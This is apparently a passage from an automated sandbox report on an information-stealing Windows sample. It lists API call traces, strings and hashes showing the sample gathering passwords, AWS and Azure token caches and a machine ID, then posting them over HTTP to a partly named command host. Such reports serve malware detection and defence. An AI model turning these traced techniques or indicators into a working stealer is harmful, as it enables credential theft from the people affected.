lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,00437194), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,00437198), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,0043719C), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371A0), ref: 00408779
lstrcatA.KERNEL32(?,004371A4), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: 2c430c111866ea7bead085e77bf79a922881979c5e01d710e4cf69a278955847
Instruction ID: 56afb4e389a047375a7c3fecc87e237edff1c9c66253eda4305babd8f6071cc6
Opcode Fuzzy Hash: 2c430c111866ea7bead085e77bf79a922881979c5e01d710e4cf69a278955847
Instruction Fuzzy Hash: 6E814D32900208ABCF11FBA1EE4A9DD7B76BF0831AF105026F601B31E1DB795E559B99

Function 0041690F Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 0041681F: StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
Part of subcall function 0041681F: lstrlenA.KERNEL32(?), ref: 0041687E
Part of subcall function 0041681F: StrStrA.SHLWAPI(00000000,?), ref: 00416893
Part of subcall function 0041681F: lstrlenA.KERNEL32(?), ref: 004168A2
Part of subcall function 0041681F: lstrlenA.KERNEL32(00000000), ref: 004168BB

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 004169F9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416A52
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B0B
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B21
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B37
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B49
Sleep.KERNEL32(0000EA60), ref: 00416B58

Strings

sqlite3.dll, xrefs: 00416BF5
ERROR, xrefs: 00416B41
ERROR, xrefs: 00416A4A
ERROR, xrefs: 00416B03
sqlite3.dll, xrefs: 00416BC1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416C07
ERROR, xrefs: 00416B19
ERROR, xrefs: 00416B2F
ERROR, xrefs: 00416AAA
sqlp.dll, xrefs: 00416C26
sqlp.dll, xrefs: 00416C57
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416C38
ERROR, xrefs: 004169F1

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-608462545
Opcode ID: 65ab4bf7943c0ce88d03fed72768ecc811f41dd0d008d9327b6f77eb6f6b9f14
Instruction ID: f73ef6e87fed90a0af8a9017d5793b0fa361095fd6fa5dd01a3b34afff2b5524
Opcode Fuzzy Hash: 65ab4bf7943c0ce88d03fed72768ecc811f41dd0d008d9327b6f77eb6f6b9f14
Instruction Fuzzy Hash: 6E915171E40119ABCF10FBA6DD47ACCB771AF04708F51402BF915B7191DBB8AE898B89

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 816acc319d1c45b0d933bc3d99c4a0f36554e803e9a58cb70e8edcba122f60b5
Instruction ID: a0d0b0c620abb1774122a8c9512d0580614d1a3ff8f129a6abe6909aa8e690fc
Opcode Fuzzy Hash: 816acc319d1c45b0d933bc3d99c4a0f36554e803e9a58cb70e8edcba122f60b5
Instruction Fuzzy Hash: AA41B7B2900218ABDB205F71AC4DF9F7B7DEF89715F1002BAF10AE11A1DA754A54CF68

Function 00416416 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 114
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0041643B

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 0041645A
lstrcatA.KERNEL32(?,\.azure\), ref: 00416477

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415F71
Part of subcall function 00415F2A: FindFirstFileA.KERNEL32(?,?), ref: 00415F88
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AA8), ref: 00415FA9
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AAC), ref: 00415FC3
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415FEA
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436647), ref: 00415FFE
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 0041601B
Part of subcall function 00415F2A: PathMatchSpecA.SHLWAPI(?,?), ref: 00416048
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?), ref: 0041607E
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC4), ref: 00416090
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160A3
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC8), ref: 004160B5
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160C9

_memset.LIBCMT ref: 004164AF
lstrcatA.KERNEL32(?,00000000), ref: 004164D1
lstrcatA.KERNEL32(?,\.aws\), ref: 004164EE

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00416032
Part of subcall function 00415F2A: FindNextFileA.KERNEL32(?,?), ref: 00416258
Part of subcall function 00415F2A: FindClose.KERNEL32(?), ref: 0041626C

_memset.LIBCMT ref: 00416523
lstrcatA.KERNEL32(?,00000000), ref: 00416545
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416562
_memset.LIBCMT ref: 00416597

Strings

\.IdentityService\, xrefs: 00416556
Azure\.aws, xrefs: 004164FE
*.*, xrefs: 00416503
\.aws\, xrefs: 004164E2
*.*, xrefs: 0041648F
yA, xrefs: 004165A9
\.azure\, xrefs: 0041646B
Azure\.IdentityService, xrefs: 00416572
msal.cache, xrefs: 00416577
Azure\.azure, xrefs: 0041648A

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$yA
API String ID: 4216275855-3945817242
Opcode ID: 98bbee0575479115316da5ddf927bce8ccd3a669379563619b2865a60fd192c1
Instruction ID: dbfb3e3bbb0bd26aa36452c5950bb7cbd8ea59d000f003dae33274b446acd3e5
Opcode Fuzzy Hash: 98bbee0575479115316da5ddf927bce8ccd3a669379563619b2865a60fd192c1
Instruction Fuzzy Hash: 3041C571D4021D7ADB24FB61EC47FDD773CEB09304F1044AAB605E70D1EAB8AA888B59

Function 00404B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,0043696F,",build_id,004377B8,------,004377AC,",hwid,00437798,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

", xrefs: 00405039
", xrefs: 00404ED9
build_id, xrefs: 0040500D
hwid, xrefs: 00404EAD
------, xrefs: 00404C75
------, xrefs: 00404F5B
------, xrefs: 00404DFB

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$build_id$hwid
API String ID: 3006978581-3960666492
Opcode ID: 3a83e2d807340c7f75ae5794a70992ee6f87d88fb59380e0824da43af1de395a
Instruction ID: ced393284342b6da1cb7b248c25f429f291cebb0c534fdf7b22d1d2b2902bda0
Opcode Fuzzy Hash: 3a83e2d807340c7f75ae5794a70992ee6f87d88fb59380e0824da43af1de395a
Instruction Fuzzy Hash: 1D02B471D5512A9ACF20EB21CD46ADDB3B5FF04308F4150E6A548B7191CAB87ECA8FD8

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373C4,0043680E,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373D0,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373D4), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373D8), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373DC), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373E0), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 9e6092c4ba79e8c771ddbec488a7d98cb25a66e475b7d1c6d11e8a2c21d1fdcc
Instruction ID: 3d07ebe3f70f71355452d1a3181a94dfe992f2dc7153668bd5b922c80bb1ad0f
Opcode Fuzzy Hash: 9e6092c4ba79e8c771ddbec488a7d98cb25a66e475b7d1c6d11e8a2c21d1fdcc
Instruction Fuzzy Hash: 4BC13C72900208AFCF21FBA1ED4A9DD7B76EF04309F10502AF501B30E1DBB86D959B95

Function 00416F9A Relevance: 30.8, APIs: 8, Strings: 9, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,004184E8), ref: 00417036
OpenEventA.KERNEL32(001F0003,00000000,?,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00417045
CreateDirectoryA.KERNEL32(?,00000000,004366F5), ref: 00417563
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417624
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0041763D

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 0041391A: StrCmpCA.SHLWAPI(?,block,?,?,0041769D), ref: 0041392F
Part of subcall function 0041391A: ExitProcess.KERNEL32 ref: 0041393A

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 004130F0: strtok_s.MSVCRT ref: 0041310F
Part of subcall function 004130F0: strtok_s.MSVCRT ref: 00413192

Sleep.KERNEL32(000003E8), ref: 004179F3

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,004184E8), ref: 00417059

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417D8A,.exe,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4,00436CA0,00436C9C,00436C98), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00417F59

Strings

dea7c01007a657ba0c601c941632f140, xrefs: 00417665
http://, xrefs: 00417DB0
.exe, xrefs: 004174A2
_DEBUG.zip, xrefs: 00417E8E
hopto, xrefs: 00417DF8
lC, xrefs: 00417E21, 00417E45
.exe, xrefs: 00417D5D
cowod., xrefs: 00417DD4
org, xrefs: 00417E40

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$_DEBUG.zip$cowod.$dea7c01007a657ba0c601c941632f140$hopto$http://$org$lC
API String ID: 305159127-663526250
Opcode ID: b488e5dfb927dad1722ab2a5ad63f42a51aed63f7f4a8689b2ca45bc1822e6c1
Instruction ID: 9248f215d08c0b4d441f2c7147c333c703e49c63d9a337bfd849f4ba2058d6af
Opcode Fuzzy Hash: b488e5dfb927dad1722ab2a5ad63f42a51aed63f7f4a8689b2ca45bc1822e6c1
Instruction Fuzzy Hash: EB9240715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 00413500 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 262stringCOMMON

Download Yara Rule

APIs

